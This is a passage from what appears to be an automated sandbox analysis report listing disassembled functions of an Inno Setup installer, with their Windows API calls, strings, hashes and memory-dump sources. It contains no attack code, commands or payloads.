                                                                                    • Instruction ID: a132d3f15b3ed1f1d80a1d3b4c170ebef992d73a30201ff541600c1582f6e0c9
                                                                                    • Opcode Fuzzy Hash: 732e9f8b326961f4a5555d537b9d01a6aab9f08cc06af6535321f619a3cc4655
                                                                                    • Instruction Fuzzy Hash: 07018470E04604AFD710DBA99952A9E77AAEB4A724B600265F524D73D0DE34DD40CA15
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004070B0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070E7
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 004070ED
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 004070FC
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 0040710D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory
                                                                                    • String ID: :
                                                                                    • API String ID: 1611563598-336475711
                                                                                    • Opcode ID: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
                                                                                    • Instruction ID: 4e46778bef482c884a40b6a77bd37b1cdf5980326a29a022de95e28d89e8e0a5
                                                                                    • Opcode Fuzzy Hash: aa9707b4d0d9c5d03511b22bbefae7383822b12ede650e628390a7387f8948e9
                                                                                    • Instruction Fuzzy Hash: 71F0627154474465D310E7658852BDB729CDF84348F04843E76C89B2D1E6BC5948979B
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0059BDE0, Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 40b3b5ba3f34c12df063ee6c251904e89849e49180af3165c918a28def48443d
                                                                                    • Instruction ID: 706b2e572761d8ad47ba34f54f722de4143ff6edab11ef8c4ec80c26a390842e
                                                                                    • Opcode Fuzzy Hash: 40b3b5ba3f34c12df063ee6c251904e89849e49180af3165c918a28def48443d
                                                                                    • Instruction Fuzzy Hash: C211A26060425956FF706A7A6F09BEA3F9C7FD1745F050429BE41AB283CB38CC458BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005B631C, Relevance: 7.5, APIs: 5, Instructions: 39threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • UnhookWindowsHookEx.USER32(00000000), ref: 005B632E
                                                                                    • SetEvent.KERNEL32(00000000), ref: 005B635A
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 005B635F
                                                                                    • MsgWaitForMultipleObjects.USER32 ref: 005B6388
                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 005B6395
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2132507429-0
                                                                                    • Opcode ID: 9ea434fb30454688688f09122d05a87b29c41a253c523ce44195e8fd4ce8e1aa
                                                                                    • Instruction ID: cd3b1eb59f2816b39bfe75ca0595b4a5fb52581fa55038232e58a65bf6996549
                                                                                    • Opcode Fuzzy Hash: 9ea434fb30454688688f09122d05a87b29c41a253c523ce44195e8fd4ce8e1aa
                                                                                    • Instruction Fuzzy Hash: AE016D70A09300AFD700EBA5EC45BAA37E5FB46714F105A2EF194C71D1DF38A880CB42
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0060CD14, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 105fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060CE51), ref: 0060CE01
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060CE51), ref: 0060CE11
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CloseCreateFileHandle
                                                                                    • String ID: .tmp$_iu
                                                                                    • API String ID: 3498533004-10593223
                                                                                    • Opcode ID: c82ceb5325a86bdc840e8660d5d66ee3278075395e2e2834d729ae026569d360
                                                                                    • Instruction ID: f0c61975f8e987b86bac7f04f067b2ad5b288a9d8ae99280b348037a25044e3b
                                                                                    • Opcode Fuzzy Hash: c82ceb5325a86bdc840e8660d5d66ee3278075395e2e2834d729ae026569d360
                                                                                    • Instruction Fuzzy Hash: CD319E30A40209ABDB14EBE4C842FDEBBB9EF44714F1042A9F804B73C2D778AE459B54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005B92C8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103timethreadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005B923C: GetCursorPos.USER32 ref: 005B9243
                                                                                    • SetTimer.USER32 ref: 005B93B3
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 005B93ED
                                                                                    • WaitMessage.USER32(00000000,005B9431,?,?,?,00000000), ref: 005B9411
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CurrentCursorMessageThreadTimerWait
                                                                                    • String ID: Dl
                                                                                    • API String ID: 3909455694-1042291793
                                                                                    • Opcode ID: 1f6f0a1c510f93f692655a977ba6e5298b4086ccb601a4d072a2bbdb339548d0
                                                                                    • Instruction ID: 597a7682cf751412642d1ca47e474f5c06ff596d9fe9d998d875485cc057c909
                                                                                    • Opcode Fuzzy Hash: 1f6f0a1c510f93f692655a977ba6e5298b4086ccb601a4d072a2bbdb339548d0
                                                                                    • Instruction Fuzzy Hash: 43416C30A04244EFDB11DFA9D88ABEDBBF6FB45304F6188B9E904972A1C7746E41CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006B7820, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(00000000,000000EC,00000000,006B791E,?,?,006D479C,?,006B7D50,00000000,006B7D5A,?,00000000,006B7D8A,?,?), ref: 006B7890
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,000000EC,00000000,006B791E,?,?,006D479C,?,006B7D50,00000000,006B7D5A,?,00000000,006B7D8A), ref: 006B78B9
                                                                                    • MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,000000EC,00000000,006B791E,?,?,006D479C,?,006B7D50,00000000,006B7D5A,?,00000000), ref: 006B78D2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: File$Attributes$Move
                                                                                    • String ID: isRS-%.3u.tmp
                                                                                    • API String ID: 3839737484-3657609586
                                                                                    • Opcode ID: 08fb3f8a2552ed2ef6fee7f0fa6a00d655b048a56f687b70bca4fdfe3b5c4a69
                                                                                    • Instruction ID: 0f43dc597fc5b70accabae0da728ee0b08a343283778375b3c6cba122b7c2eac
                                                                                    • Opcode Fuzzy Hash: 08fb3f8a2552ed2ef6fee7f0fa6a00d655b048a56f687b70bca4fdfe3b5c4a69
                                                                                    • Instruction Fuzzy Hash: 95318170D04208AFCB00EBA9C8859EEB7B9EF84314F11467AF814B7291D7385E81CB99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00614D0C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000B06,00000000,00000000), ref: 00614D26
                                                                                    • SendMessageW.USER32(00000000,00000B00,00000000,00000000), ref: 00614DC3
                                                                                    Strings
                                                                                    • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00614D52
                                                                                    • Failed to create DebugClientWnd, xrefs: 00614D8C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                    • API String ID: 3850602802-3720027226
                                                                                    • Opcode ID: ea57cd588fe8570c91b24ef0b746a875249b5149722270d15631428ffe25c9ac
                                                                                    • Instruction ID: d134127b693325792274e9a01a70f49e89543c9fcfe531e84006ac1a280ab911
                                                                                    • Opcode Fuzzy Hash: ea57cd588fe8570c91b24ef0b746a875249b5149722270d15631428ffe25c9ac
                                                                                    • Instruction Fuzzy Hash: 3311E7B1A043519FD700EB69EC81F9A7B95AF45314F08402AF585CB392DB759C84C7A5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00624438, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005C5124: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,006D479C,00000000,0060D257,00000000,0060D532,?,?,006D479C), ref: 005C5155
                                                                                    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0062447B
                                                                                    • RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 00624497
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Type$FullLoadNamePathRegister
                                                                                    • String ID: LoadTypeLib$RegisterTypeLib
                                                                                    • API String ID: 4170313675-2435364021
                                                                                    • Opcode ID: 3aca009d31f0f1a8cac111bc50824ede26e8fddbcab806dd9635b5a5ee37d0ef
                                                                                    • Instruction ID: e38850ae6034221aecf35b856b26f0223ed0c8226c2a0ebd231c24fb5e5372d8
                                                                                    • Opcode Fuzzy Hash: 3aca009d31f0f1a8cac111bc50824ede26e8fddbcab806dd9635b5a5ee37d0ef
                                                                                    • Instruction Fuzzy Hash: 4D0148307406046BDB10FBA6DC82B4E77EDEB48704F504875B500F6292DB74AE158A19
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0060D449, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0060D454
                                                                                      • Part of subcall function 00423A18: DeleteFileW.KERNEL32(00000000,?,?,006D479C,?,006B7D35,00000000,006B7D8A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A28
                                                                                      • Part of subcall function 00423A18: GetLastError.KERNEL32(00000000,?,?,006D479C,?,006B7D35,00000000,006B7D8A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A37
                                                                                      • Part of subcall function 00423A18: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D479C,?,006B7D35,00000000,006B7D8A,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A3F
                                                                                      • Part of subcall function 00423A18: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D479C,?,006B7D35,00000000,006B7D8A,?,?,00000005,?,00000000,00000000), ref: 00423A5A
                                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 0060D481
                                                                                      • Part of subcall function 0060C7E4: GetLastError.KERNEL32(00000000,0060D50A,00000005,00000000,0060D532,?,?,006D479C,?,00000000,00000000,00000000,?,006B79CB,00000000,006B79E6), ref: 0060C7E7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: File$AttributesErrorLast$DeleteDirectoryMoveRemove
                                                                                    • String ID: DeleteFile$MoveFile
                                                                                    • API String ID: 3947864702-139070271
                                                                                    • Opcode ID: f3368971435f0e1ffcad46702f9ad1321795944c84a6ed4736d87a1c7c95c989
                                                                                    • Instruction ID: e65586cb8c2ba221caf3cfd224dcd0eff8e091a7cc457f3bf2639edee59451d9
                                                                                    • Opcode Fuzzy Hash: f3368971435f0e1ffcad46702f9ad1321795944c84a6ed4736d87a1c7c95c989
                                                                                    • Instruction Fuzzy Hash: 42F049716841054ADB09FBF6E9065AF63E5EF44318F504A7EF804E72C1D63C9C05462D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00626D74, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005C6790: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,jn\,?,00000000,?,005C6E0A,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C6E6A), ref: 005C67AC
                                                                                    • RegCloseKey.ADVAPI32(00000000,?,00000001,00000000,00000003,00626BCC,00000003,00000000,00626F17,00000000,006270D1,?,00626BCC,?,00000000,00000000), ref: 00626DC1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CloseOpen
                                                                                    • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                    • API String ID: 47109696-2631785700
                                                                                    • Opcode ID: ec07e0db51d3c638d208cea47c9fb61d7565527b1549b85ae51ece4d1ddb7960
                                                                                    • Instruction ID: 8af0ce4ad620272c9594f6d9018686f01a2d88763efb0c0a0c7834eb730a36f0
                                                                                    • Opcode Fuzzy Hash: ec07e0db51d3c638d208cea47c9fb61d7565527b1549b85ae51ece4d1ddb7960
                                                                                    • Instruction Fuzzy Hash: 32F02231B01528AFD710AF49E845B9A6BCADFD6352F91143AF185C3290E6B1CC028F92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005C67B8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegDeleteKeyW.ADVAPI32(?,00000000), ref: 005C67C4
                                                                                    • GetModuleHandleW.KERNEL32(advapi32.dll,RegDeleteKeyExW,?,00000000,005C69AB,00000000,005C69C3,?,?,?), ref: 005C67DF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: DeleteHandleModule
                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                    • API String ID: 3550747403-4033151799
                                                                                    • Opcode ID: 446bbcfcc69e87ec6a54bc98b0bd0db8a719cbf54cb0d116f2ffc1e03499b033
                                                                                    • Instruction ID: dc63331fa5a8f3f500f99eadda01b9e76553ba7a97e57ea72adecfe1af790e06
                                                                                    • Opcode Fuzzy Hash: 446bbcfcc69e87ec6a54bc98b0bd0db8a719cbf54cb0d116f2ffc1e03499b033
                                                                                    • Instruction Fuzzy Hash: 84E06DB0A42210AFD32467A9BC4AFD22F89FB8575EF50382FF10155492CBB84D90C2A4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005C745C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,?,00000004,006CBEB0,00614DAA,00615224,00614CC8,00000000,00000B06,00000000,00000000), ref: 005C7476
                                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                      • Part of subcall function 005C73C0: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C74B6,?,00000004,006CBEB0,00614DAA,00615224,00614CC8,00000000,00000B06,00000000,00000000), ref: 005C73D7
                                                                                    • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,?,00000004,006CBEB0,00614DAA,00615224,00614CC8,00000000,00000B06,00000000,00000000), ref: 005C74A7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
